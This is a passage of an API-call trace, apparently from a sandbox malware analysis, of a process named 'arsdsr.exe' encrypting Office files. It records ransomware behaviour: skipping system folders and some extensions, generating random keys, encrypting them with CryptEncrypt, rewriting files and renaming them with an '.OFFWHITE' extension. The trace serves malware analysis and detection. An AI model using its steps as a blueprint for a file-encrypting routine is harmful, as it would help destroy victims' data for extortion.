lpString2="rsa") returned 1 [0145.328] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0145.328] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="programdata") returned 1 [0145.329] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="appdata") returned 1 [0145.329] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="program files") returned 1 [0145.329] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0145.329] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0145.329] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="XLINTL32.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" [0145.329] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.329] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.329] PathFindExtensionW (pszPath="XLINTL32.DLL.trx_dll") returned=".trx_dll" [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.329] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.329] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.330] GetProcessHeap () returned 0x500000 [0145.330] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eb90 [0145.330] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.333] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=152416) returned 1 [0145.333] GetProcessHeap () returned 0x500000 [0145.333] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.333] GetProcessHeap () returned 0x500000 [0145.333] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.333] GetProcessHeap () returned 0x500000 [0145.333] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.333] GetProcessHeap () returned 0x500000 [0145.333] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.333] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.333] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.333] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.333] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.333] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.333] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.333] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.333] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.333] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.334] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.334] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.334] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.334] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x25360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.334] SetLastError (dwErrCode=0x0) [0145.334] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.337] GetLastError () returned 0x0 [0145.337] GetLastError () returned 0x0 [0145.337] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x25460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.337] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.338] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x25560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.338] WriteFile (in: hFile=0x218, lpBuffer=0x52eb90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eb90*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.338] GetProcessHeap () returned 0x500000 [0145.338] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x25360) returned 0x5607c8 [0145.338] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.338] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x25360, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x25360, lpOverlapped=0x0) returned 1 [0145.349] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.349] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x25360, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x25360, lpOverlapped=0x0) returned 1 [0145.349] GetProcessHeap () returned 0x500000 [0145.349] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.350] CloseHandle (hObject=0x218) returned 1 [0145.350] GetProcessHeap () returned 0x500000 [0145.350] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.350] GetProcessHeap () returned 0x500000 [0145.350] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.350] GetProcessHeap () returned 0x500000 [0145.350] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.350] GetProcessHeap () returned 0x500000 [0145.350] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.350] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" [0145.350] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.OFFWHITE" [0145.350] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.dll.trx_dll.offwhite")) returned 1 [0145.351] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a375400, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6a375400, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x137960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="XLINTL32.REST.trx_dll", cAlternateFileName="XLINTL~2.TRX")) returned 1 [0145.351] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2=".") returned 1 [0145.351] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="..") returned 1 [0145.351] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="...") returned 1 [0145.351] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="windows") returned 1 [0145.351] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0145.351] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="rsa") returned 1 [0145.351] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0145.351] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="programdata") returned 1 [0145.351] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="appdata") returned 1 [0145.351] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="program files") returned 1 [0145.351] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="program files (x86)") returned 1 [0145.351] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0145.351] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="XLINTL32.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" [0145.351] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.352] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.352] PathFindExtensionW (pszPath="XLINTL32.REST.trx_dll") returned=".trx_dll" [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.352] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.352] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.352] GetProcessHeap () returned 0x500000 [0145.352] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52eba0 [0145.352] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.353] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=1276256) returned 1 [0145.353] GetProcessHeap () returned 0x500000 [0145.353] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.353] GetProcessHeap () returned 0x500000 [0145.353] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.353] GetProcessHeap () returned 0x500000 [0145.353] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.353] GetProcessHeap () returned 0x500000 [0145.353] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.353] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.353] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.353] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.353] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.353] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.353] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.354] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.354] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.354] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.354] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.354] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.354] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.354] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x137960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.354] SetLastError (dwErrCode=0x0) [0145.354] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.356] GetLastError () returned 0x0 [0145.356] GetLastError () returned 0x0 [0145.356] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x137a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.357] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.357] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x137b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.357] WriteFile (in: hFile=0x218, lpBuffer=0x52eba0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52eba0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.357] GetProcessHeap () returned 0x500000 [0145.357] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x927c0) returned 0x2a60020 [0145.358] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.358] ReadFile (in: hFile=0x218, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x927c0, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295d1c0*=0x927c0, lpOverlapped=0x0) returned 1 [0145.424] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.424] WriteFile (in: hFile=0x218, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x927c0, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295d1cc*=0x927c0, lpOverlapped=0x0) returned 1 [0145.426] GetProcessHeap () returned 0x500000 [0145.426] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0145.430] CloseHandle (hObject=0x218) returned 1 [0145.430] GetProcessHeap () returned 0x500000 [0145.430] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.430] GetProcessHeap () returned 0x500000 [0145.430] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.430] GetProcessHeap () returned 0x500000 [0145.430] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.430] GetProcessHeap () returned 0x500000 [0145.430] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.430] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" [0145.430] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.OFFWHITE" [0145.430] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll.offwhite")) returned 1 [0145.433] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe092000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe092000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3d60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 1 [0145.433] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2=".") returned 1 [0145.434] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="..") returned 1 [0145.434] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="...") returned 1 [0145.434] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="windows") returned 1 [0145.434] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.434] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="rsa") returned 1 [0145.434] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0145.434] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="programdata") returned 1 [0145.434] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="appdata") returned 1 [0145.434] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="program files") returned 1 [0145.434] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0145.434] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0145.434] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="XLSLICER.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" [0145.434] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.434] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.434] PathFindExtensionW (pszPath="XLSLICER.DLL.trx_dll") returned=".trx_dll" [0145.434] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.434] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.434] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.434] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.434] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.434] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.434] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.434] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.434] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.434] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.435] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.435] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.435] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.435] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.435] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.435] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.435] GetProcessHeap () returned 0x500000 [0145.435] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ebb0 [0145.435] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.441] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=15712) returned 1 [0145.441] GetProcessHeap () returned 0x500000 [0145.441] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.441] GetProcessHeap () returned 0x500000 [0145.441] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.441] GetProcessHeap () returned 0x500000 [0145.441] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.441] GetProcessHeap () returned 0x500000 [0145.441] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.441] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.441] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.441] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.441] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.441] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.441] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.441] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.441] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.441] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.442] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.442] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.442] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 